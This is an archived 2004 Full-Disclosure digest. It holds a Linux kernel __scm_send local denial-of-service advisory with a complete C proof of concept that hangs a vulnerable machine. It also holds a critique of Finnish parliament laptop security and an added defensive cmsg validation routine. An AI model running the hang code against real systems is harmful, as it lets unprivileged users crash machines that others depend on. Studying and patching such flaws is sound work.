Full Disclosure mailing list archives
[Full-Disclosure] Subject: Full-disclosure Digest, Vol 1, Issue 2116 (Back on Tuesday 28 December.)
From: "Christophe Savin" <christophe.savin () tdf fr>
Date: Wed, 22 Dec 2004 05:27:05 +0100
In my absence, any request concerning the networks must be sent to the mailbox ars_reseaux () tdf fr (or ars_transpac for any incident related to that network).

In case of emergency, you can contact:
The Networks Hot-line: 01 49 15 32 53
François LEVEQUE at 01 49 15 30 56
Pascal PAINPARAY at 01 49 15 31 36

Happy holidays.

Christophe SAVIN
full-disclosure 12/19/04 18:00 >>>
Send Full-Disclosure mailing list submissions to
	full-disclosure () lists netsys com

To subscribe or unsubscribe via the World Wide Web, visit
	https://lists.netsys.com/mailman/listinfo/full-disclosure
or, via email, send a message with subject or body 'help' to
	full-disclosure-request () lists netsys com

You can reach the person managing the list at
	full-disclosure-owner () lists netsys com

When replying, please edit your Subject line so it is more specific than "Re: Contents of Full-Disclosure digest..."

Today's Topics:

   1. Re: HyperTerminal - Buffer Overflow In .ht File (Gregory Gilliss)
   2. [VulnDiscuss] Re: Linux kernel scm_send local DoS (even multiplexed)
   3. E-mail tracking finds murderess and baby in kidnap-homicide case. (Tamas Feher)
   4. Re: Security breach database (Willem Koenings)
   5. Insecurity in Finnish parlament (computers) (Markus Jansson)

----------------------------------------------------------------------

Message: 1
Date: Fri, 17 Dec 2004 10:38:23 -0800
From: Gregory Gilliss <ggilliss () netpublishing com>
Subject: Re: [Full-disclosure] HyperTerminal - Buffer Overflow In .ht File
To: full-disclosure () lists netsys com
Message-ID: <20041217183823.GA20342 () netpublishing com>
Content-Type: text/plain; charset=us-ascii

Great, so while I'm using HyperTerminal on my network-connected machine (!) to update my hardware for the latest exploit, along comes someone with this and hacks my client laptop. Somehow I'm glad that I only use UNIX...

-- Greg

On or about 2004.12.15 11:59:56 +0000, Brett Moore (brett.moore () security-assessment com) said:
========================================================================
= HyperTerminal - Buffer Overflow In .ht File
=
= MS Bulletin posted:
= http://www.microsoft.com/technet/security/bulletin/MS04-043.mspx
=
= Affected Software:
= Microsoft Windows NT Server 4.0 SP 6a
= Microsoft Windows NT Server 4.0 Terminal Server Edition SP6
= Microsoft Windows 2000 SP4
= Microsoft Windows XP SP2
= Microsoft Windows XP 64-Bit Edition SP1
= Microsoft Windows XP 64-Bit Edition Version 2003
= Microsoft Windows Server 2003
= Microsoft Windows Server 2003 64-Bit Edition
=
= Public disclosure on December 15, 2004
========================================================================
<<SNIP>>

--
Gregory A. Gilliss, CISSP                      E-mail: greg () gilliss com
Computer Security                       WWW: http://www.gilliss.com/greg/
PGP Key fingerprint 2F 0B 70 AE 5F 8E 71 7A 2D 86 52 BA B7 83 D9 B4 14 0E 8C A3

------------------------------

Message: 2
Date: Wed, 15 Dec 2004 04:23:22 +0100
From: even multiplexed <Shadow333 () gmx at>
Subject: [Full-disclosure] [VulnDiscuss] Re: Linux kernel scm_send local DoS
To: security () isec pl
Cc: vulnwatch () vulnwatch org, bugtraq () securityfocus com, full-disclosure () lists netsys com
Message-ID: <41BFAE2A.7040002 () gmx at>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed

Paul Starzetz wrote:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Synopsis:  Linux kernel scm_send local DoS
Product:   Linux kernel
Version:   2.4 up to and including 2.4.28, 2.6 up to and including 2.6.9
Vendor:    http://www.kernel.org/
URL:       http://isec.pl/vulnerabilities/isec-0019-scm.txt
CVE:       CAN-2004-1016
Author:    Paul Starzetz <ihaquer () isec pl>
Date:      Dec 14, 2004

Issue:
======

A locally exploitable flaw has been found in the Linux socket layer, that allows a local user to hang a vulnerable machine.

Details:
========

The Linux kernel provides a powerful socket API to user applications. Among other functions, sockets provide a universal way for IPC and user-kernel communication. The socket layer uses several logical sublayers. One of the layers, the so-called auxiliary message layer (or scm layer), augments the socket API by a universal user-kernel message passing capability (see recvfrom(2) for more details on auxiliary messages).

One of the scm message parsing functions invoked from the kernel sendmsg() code is __scm_send(), and it suffers from a deadlock condition if carefully prepared auxiliary message(s) are sent to a socket by an unprivileged application.

We believe that the 2.4 kernel branch is not further exploitable. The 2.6 branch has not been extensively checked; however, it may be locally exploitable to gain elevated privileges due to its increased complexity.

Discussion:
===========

See attached code.

Impact:
=======

Unprivileged local users may hang a vulnerable Linux machine.

Credits:
========

Paul Starzetz <ihaquer () isec pl> has identified the vulnerability and performed further research.

COPYING, DISTRIBUTION, AND MODIFICATION OF INFORMATION PRESENTED HERE IS ALLOWED ONLY WITH EXPRESS PERMISSION OF ONE OF THE AUTHORS.

Disclaimer:
===========

This document and all the information it contains are provided "as is", for educational purposes only, without warranty of any kind, whether express or implied.
The authors reserve the right not to be responsible for the topicality, correctness, completeness or quality of the information provided in this document. Liability claims regarding damage caused by the use of any information provided, including any kind of information which is incomplete or incorrect, will therefore be rejected.

Appendix:
=========

/*
 * Linux kernel 2.4 & 2.6 __scm_send DoS
 * Warning! this code will hang your machine
 *
 * gcc -O2 scmbang.c -o scmbang
 *
 * Copyright (c) 2004 iSEC Security Research. All Rights Reserved.
 *
 * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
 * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
 * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
 *
 */

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>      /* exit() */
#include <string.h>      /* memset() */
#include <errno.h>
#include <sys/socket.h>
#include <netinet/in.h>  /* SOL_IP, struct sockaddr_in */
#include <arpa/inet.h>

static char buf[1024];

void fatal (const char *msg)
{
	printf ("\n");
	if (!errno) {
		fprintf (stderr, "FATAL: %s\n", msg);
	} else {
		perror (msg);
	}
	printf ("\n");
	fflush (stdout);
	fflush (stderr);
	exit (1);
}

int main (void)
{
	int s[2], r;
	struct sockaddr_in sin;
	struct msghdr *msg;
	struct cmsghdr *cmsg;

	r = socketpair (AF_UNIX, SOCK_DGRAM, 0, s);
	if (r < 0)
		fatal ("socketpair");

	/* msghdr at the start of buf, control data right behind it */
	memset (buf, 0, sizeof (buf));
	msg = (void *) buf;
	msg->msg_control = (void *) (msg + 1);

	// make bad cmsgs
	cmsg = (void *) msg->msg_control;
	cmsg->cmsg_len = sizeof (*cmsg);
	cmsg->cmsg_level = 0xdeadbebe;
	cmsg->cmsg_type = 12;

	// len after overflow on second msg
	cmsg++;

	// -12 for deadlock
	cmsg->cmsg_len = -12;
	cmsg->cmsg_level = SOL_IP;

	/* pointer difference instead of the original unsigned casts (same value) */
	msg->msg_controllen = (char *) (cmsg + 1) - (char *) msg->msg_control;

	r = sendmsg (s[0], msg, 0);
	if (r < 0)
		fatal ("sendmsg");

	printf ("\nYou lucky\n");
	fflush (stdout);
	return 0;
}

- --
Paul Starzetz
iSEC Security Research
http://isec.pl/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQFBvsFeC+8U3Z5wpu4RAkcYAJ9ZANZb3Yt8LHIZHu4YTiKN+Htt3QCfZ0rH
ZB8QMKmLVyKaQ5fvN/l8mL8=
=2hQr
-----END PGP SIGNATURE-----
Dear Ladies and Gentlemen,

First of all, thanks to Mr. Starzetz for bringing this bug to our attention. I just wanted to ask if anyone has a tip for me on how to quick-fix this bug, without actually rebuilding a patched version of the kernel. I'd be thankful for every tip. I hope there's actually a way to do that, because our customers wouldn't like that system of ours to reboot :/

greets
Oliver Leitner

------------------------------

Message: 3
Date: Sat, 18 Dec 2004 21:13:24 +0100
From: "Tamas Feher" <etomcat () freemail hu>
Subject: [Full-disclosure] E-mail tracking finds murderess and baby in kidnap-homicide case.
To: full-disclosure () lists netsys com
Message-ID: <41C49D74.29818.C2BE56@localhost>
Content-Type: text/plain; charset=US-ASCII

Not for the faint of heart.

"http://www.cnn.com/2004/US/12/18/fetus.found.alive/index.html"

BTW I love capital punishment!

Regards: Tamas Feher.

------------------------------

Message: 4
Date: Sun, 19 Dec 2004 00:04:06 +0200
From: Willem Koenings <infsec () gmail com>
Subject: Re: [Full-disclosure] Security breach database
To: full-disclosure () lists netsys com
Message-ID: <9b13f6c1041218140468012145 () mail gmail com>
Content-Type: text/plain; charset=US-ASCII
Looking for a few interesting security breach stories...
Something to learn from :)

http://www.dataloss.net/papers/how.defaced.apache.org.txt

W.

------------------------------

Message: 5
Date: Sun, 19 Dec 2004 03:19:38 +0200
From: Markus Jansson <markus.jansson () hushmail com>
Subject: [Full-disclosure] Insecurity in Finnish parlament (computers)
To: full-disclosure () lists netsys com
Message-ID: <41C4D72A.2010501 () hushmail com>
Content-Type: text/plain; charset=ISO-8859-15; format=flowed

Short version:
-------------
http://www.markusjansson.net/erecent.html#comments

"The laptop computers used by members of parliament and their assistants here in Finland have severe security holes. These laptop computers don't have firewalls, file encryption or wiping tools, automatic update is not turned on, the operating system (Windows XP) is on its default settings for most, the computers only support 802.11b WLAN which is insecure, etc. etc. As a bonus, they use TeliaSonera GSMs which are totally insecure because they use COMP-128-1 and A5/1 for security. I contacted them months ago but they haven't bothered to answer me, nor the reporters I have contacted later. Oh dear..."

Long version:
-------------
1. The computers do not have a firewall, not even ICF enabled. Users cannot even enable it themselves, since they don't have administrative permissions on the computers. Any remote-exploit vulnerability or bad passphrase and BUM! The computer is hacked.

2. The computers are mainly on default settings. They are Windows XP. Do I really need to say more about this issue and what happens from it?

3. The computers have support for Bluetooth and it is enabled by default. This leaves many attack vectors in place that are too numerous for me to tell you. Also, they have FireWire enabled, which means that, as in the iPod's case, anyone with such a device can walk up to one of these laptops and download everything inside it. Ouch.

4. Laptops have WLAN, but it only supports the totally insecure 802.11b standard.

5. Computers do not have any kind of encryption programs. All files and folders are unencrypted. Even EFS is turned off. There is no way to secure personal or sensitive documents on the computer.

6. There are no wiping tools on the computers to wipe off sensitive or personal files from them.

7. Computers do not have "Clear pagefile on shutdown" enabled, meaning that sensitive data can be recovered from the unwashed swapfile later on.

8. Users do not have administrator permissions on the computer so they could install necessary security programs on them. Of course, there is the plus side that this *should* limit the damage to the systems to...well..the user (= the member of parliament or their assistants). Ouch.

9. There are VPN connections on the computers, but it is unclear whether they are protected against man-in-the-middle attacks or not. My educated guess is that they aren't, meaning again...

10. It's unclear whether the computers are set to "automatic updates" or not. My educated guess is that they aren't, meaning again (especially if you look at point 1 again)...ouch.

11. The default browser is Internet Explorer, with default settings of course. Now, I don't have to tell you how serious a security risk this is, especially if you consider point 10...

12. MEPs etc. use TeliaSonera GSMs. The security that TeliaSonera uses is COMP-128-1 and A5/1, which are all totally insecure and can easily be broken with a laptop computer etc., meaning that their conversations can easily be eavesdropped. They should use COMP-128-3 and A5/3 to make it secure...

13. At TeliaSonera GSM networks, there is no protection against the "false base station" technique, which allows easy bypass of crypto by simply turning it off from the "base station". For example, Elisa uses COMP-128-3 and A5/3 and does not allow phones to turn off crypto even if the base station orders them to do so.

I contacted the security personnel in our parliament about this issue months ago. They haven't even bothered to answer me, not to mention that they would have fixed the computers' security problems. So, here it is, maybe they'll listen now.

--
My computer security & privacy related homepage
http://www.markusjansson.net
Use HushTools or GnuPG/PGP to encrypt any email before sending it to me to protect our privacy.

------------------------------

_______________________________________________
Full-Disclosure mailing list
Full-Disclosure () lists netsys com
https://lists.netsys.com/mailman/listinfo/full-disclosure

End of Full-Disclosure Digest, Vol 1, Issue 2116
************************************************

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
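The hang described in Message 2 of the digest above comes from a cmsg_len of -12 that a bounds check of the form offset + cmsg_len > msg_controllen accepts once the addition wraps. As an added example, not part of the digest or of the iSEC advisory, the walk below bounds each header against the bytes remaining instead, the check a user-space service receiving ancillary data (SCM_RIGHTS, for instance) could apply before trusting a control buffer; validate_cmsg_chain and check_two_headers are assumed names and the inputs are constructed.

```c
#include <stddef.h>
#include <string.h>
#include <sys/socket.h>
#ifndef CMSG_ALIGN /* glibc and musl define it; fallback for other libcs */
#define CMSG_ALIGN(l) (((l) + sizeof(size_t) - 1) & ~(sizeof(size_t) - 1))
#endif

/* Walk a msghdr's control buffer with wrap-safe bounds checks. Returns the
 * number of well-formed cmsgs, or -1 at the first header whose length would
 * make a CMSG_NXTHDR-style loop step backwards or past the buffer.
 * Assumed user-space helper; it is not the kernel's __scm_send. */
int validate_cmsg_chain(const struct msghdr *msg)
{
    const unsigned char *base = msg->msg_control;
    size_t len = msg->msg_controllen, off = 0, remaining, step;
    struct cmsghdr hdr;
    int count = 0;
    if (base == NULL)
        return len == 0 ? 0 : -1;
    while (off < len) {
        remaining = len - off;
        if (remaining < sizeof hdr)
            break;                              /* trailing slack ends the chain */
        memcpy(&hdr, base + off, sizeof hdr);   /* no unaligned access */
        /* Compare with what is left instead of computing off + cmsg_len:
         * the subtraction cannot wrap, so a length of (size_t)-12 fails. */
        if (hdr.cmsg_len < sizeof hdr || hdr.cmsg_len > remaining)
            return -1;
        count++;
        step = CMSG_ALIGN(hdr.cmsg_len);
        off += step > remaining ? remaining : step;
    }
    return count;
}

/* Constructed input: two headers back to back. second_len = (size_t)-12
 * mirrors the advisory's layout; sizeof(struct cmsghdr) is well formed. */
int check_two_headers(size_t second_len)
{
    unsigned char buf[2 * sizeof(struct cmsghdr)];
    struct msghdr msg = { 0 };
    struct cmsghdr hdr = { .cmsg_len = sizeof(struct cmsghdr),
                           .cmsg_level = SOL_SOCKET, .cmsg_type = SCM_RIGHTS };
    memcpy(buf, &hdr, sizeof hdr);
    hdr.cmsg_len = second_len;
    memcpy(buf + sizeof hdr, &hdr, sizeof hdr);
    msg.msg_control = buf;
    msg.msg_controllen = sizeof buf;
    return validate_cmsg_chain(&msg);
}
```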